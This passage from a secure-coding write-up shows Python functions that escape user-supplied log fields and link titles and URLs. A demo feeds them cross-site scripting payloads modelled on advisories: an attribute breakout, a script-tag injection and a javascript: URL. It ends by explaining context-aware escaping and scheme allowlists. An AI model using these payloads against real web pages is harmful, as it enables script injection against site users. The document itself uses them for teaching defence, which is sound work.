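def render_log_row(level, message, file, line):
    """The Zoneminder case: user-controlled log fields rendered as table cells."""
    cells = "".join(f"<td>{esc_text(v)}</td>" for v in (level, message, file, line))
    return "<tr>" + cells + "</tr>"


def render_link(title, url):
    """The Grafana case: panel drilldown link built from a user-supplied title and URL."""
    return f'<a href="{safe_url(url)}" target="_blank" rel="noopener">{esc_text(title)}</a>'


if __name__ == "__main__":
    # Constructed inputs in the shape of the advisories' payloads.
    print(render_login_form('/youthappam/login.php/lu555"><a href="https://example.invalid/">'))
    print(render_log_row("ERR", "PoC", "http://h/zm/</td></tr><script src='/zm/x'</script>", "105"))
    print(render_link("<h1>Hello</h1>", "javascript:alert(1)"))
```

The point the four advisories make together is that a single escaping function is not enough: the attribute case needs quotes escaped, the text case needs angle brackets escaped, and a URL-bearing attribute additionally needs a scheme allowlist, because `javascript:` survives HTML escaping untouched. A template engine with context-aware autoescaping does this for you; hand-built HTML like the pages above does not.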